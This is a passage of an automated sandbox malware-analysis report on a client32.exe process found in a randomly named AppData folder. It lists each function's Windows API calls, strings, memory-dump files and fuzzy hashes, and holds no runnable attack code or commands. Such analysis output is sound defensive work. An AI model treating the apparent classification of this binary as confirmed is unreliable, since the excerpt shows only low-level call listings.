                                                                                                                                                      • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                                                                                      • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                                                                                      • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                                                                                      • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 11027850
                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 11027856
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                                                                    • String ID: Exit Msgloop, quit=%d
                                                                                                                                                    • API String ID: 3212272093-2210386016
                                                                                                                                                    • Opcode ID: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                                                                                                    • Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
                                                                                                                                                    • Opcode Fuzzy Hash: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                                                                                                    • Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5
                                                                                                                                                    Function 110179E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 110179ED
                                                                                                                                                      • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(00000310,000000FF), ref: 1101792C
                                                                                                                                                      • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
                                                                                                                                                      • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                                                                                      • Part of subcall function 110178F0: CoUninitialize.COMBASE ref: 110179C0
                                                                                                                                                      • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(00000310,000000FF), ref: 11017842
                                                                                                                                                      • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                                                                                      • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                                                                                      • Part of subcall function 11017810: CoUninitialize.COMBASE ref: 110178D0
                                                                                                                                                    • SetEvent.KERNEL32(00000310), ref: 11017A0D
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11017A13
                                                                                                                                                    Strings
                                                                                                                                                    • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                                                                                    • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                                                                    • API String ID: 3804766296-4122679463
                                                                                                                                                    • Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                                                                                    • Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
                                                                                                                                                    • Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                                                                                    • Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1
                                                                                                                                                    Function 6CA84FB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6CA84FC4
                                                                                                                                                    • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6CA88E0D,00000000,?,6CA88E0D,00000000,?,00000FA0,?), ref: 6CA84FE4
                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,6CA88E0D,00000000,?,00000FA0,?), ref: 6CA84FED
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                                                                                    • String ID: EnumProcessModules
                                                                                                                                                    • API String ID: 3858832252-3735562946
                                                                                                                                                    • Opcode ID: a8ba9b0f871dcc9260ab77d0d5e70bd6b340c7d19ce6c80ec6663c6273d72b53
                                                                                                                                                    • Instruction ID: 6eeba364c6817eaaa20c2923811345a7ed41a5a97133b88377759391c552a23e
                                                                                                                                                    • Opcode Fuzzy Hash: a8ba9b0f871dcc9260ab77d0d5e70bd6b340c7d19ce6c80ec6663c6273d72b53
                                                                                                                                                    • Instruction Fuzzy Hash: 84F058B2604328AFC714DFA8D844E9B77ACFB48721F00C91AF95A97A40C670E850CBA0
                                                                                                                                                    Function 6CA85000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6CA85014
                                                                                                                                                    • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6CA88E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6CA85034
                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,6CA88E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6CA8503D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorFileLastModuleNameProc
                                                                                                                                                    • String ID: GetModuleFileNameExA
                                                                                                                                                    • API String ID: 4084229558-758377266
                                                                                                                                                    • Opcode ID: e203d8fb7d94ab59d6d0e3fdd027ac4d2fde30802a2ce2949491f3459cffb7c1
                                                                                                                                                    • Instruction ID: d7a843484dbbe03eba64e41c6ae2311331dad201f7ba36d52c6e4928757c3ae8
                                                                                                                                                    • Opcode Fuzzy Hash: e203d8fb7d94ab59d6d0e3fdd027ac4d2fde30802a2ce2949491f3459cffb7c1
                                                                                                                                                    • Instruction Fuzzy Hash: 38F05EB2601318AFD724CF94E804A9777B8EB48710F00891AF946D7640C671E9508BB1
                                                                                                                                                    Function 11138740 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,111396D2,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11138785
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateHandleThread__wcstoi64
                                                                                                                                                    • String ID: *AutoICFConfig$Client
                                                                                                                                                    • API String ID: 3257255551-59951473
                                                                                                                                                    • Opcode ID: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                                                                                                    • Instruction ID: 465e4da249eed1782d5a870e25bf0fc53578c4739eb9f60baa785aa5b16743b3
                                                                                                                                                    • Opcode Fuzzy Hash: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                                                                                                    • Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755
                                                                                                                                                    Function 11070F90 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 11070FE7
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 11070FF4
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110710C6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$EnterLeaveSleep
                                                                                                                                                    • String ID: Push
                                                                                                                                                    • API String ID: 1566154052-4278761818
                                                                                                                                                    • Opcode ID: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                                                                                    • Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
                                                                                                                                                    • Opcode Fuzzy Hash: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                                                                                    • Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90
                                                                                                                                                    Function 6CA8A4E0 Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(6CACB898,00000000,?,?,?,6CA8DA7F,?,00000000), ref: 6CA8A503
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 6CA8A568
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,6CA8DA7F,?,00000000), ref: 6CA8A581
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6CACB898,00000000), ref: 6CA8A5B3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4212191310-0
                                                                                                                                                    • Opcode ID: 2a17471eac546953375622a43136d83da86e3f446221c536074ec4ff4675b14a
                                                                                                                                                    • Instruction ID: 7a937ad65ce76fd2469be56c8571006c7942209f65c6245caae16a6d6f2099f7
                                                                                                                                                    • Opcode Fuzzy Hash: 2a17471eac546953375622a43136d83da86e3f446221c536074ec4ff4675b14a
                                                                                                                                                    • Instruction Fuzzy Hash: 222149B2F023019FDB198F49D84078AB3BAEF82318F094517D86693AC0D331BDC58B52
                                                                                                                                                    Function 11030DA7 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1314093303-0
                                                                                                                                                    • Opcode ID: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                                                                                    • Instruction ID: 29ddb86f1ee71f4f843e45b5762510f7855215705a57359ad908d625b59217dc
                                                                                                                                                    • Opcode Fuzzy Hash: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                                                                                    • Instruction Fuzzy Hash: DEF08135E0521ACFDB14DFA5D998BADF774EF84319F0041A9D52A53680DF346540CB40
                                                                                                                                                    Function 111447F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe, xrefs: 11144804, 11144812
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentFileModuleNameProcess
                                                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe
                                                                                                                                                    • API String ID: 2251294070-2059335969
                                                                                                                                                    • Opcode ID: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                                                                                                    • Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
                                                                                                                                                    • Opcode Fuzzy Hash: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                                                                                                    • Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
                                                                                                                                                    Function 11110230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 11110239
                                                                                                                                                      • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                                                                                      • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                                                                                      • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                                                    • _memset.LIBCMT ref: 11110262
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
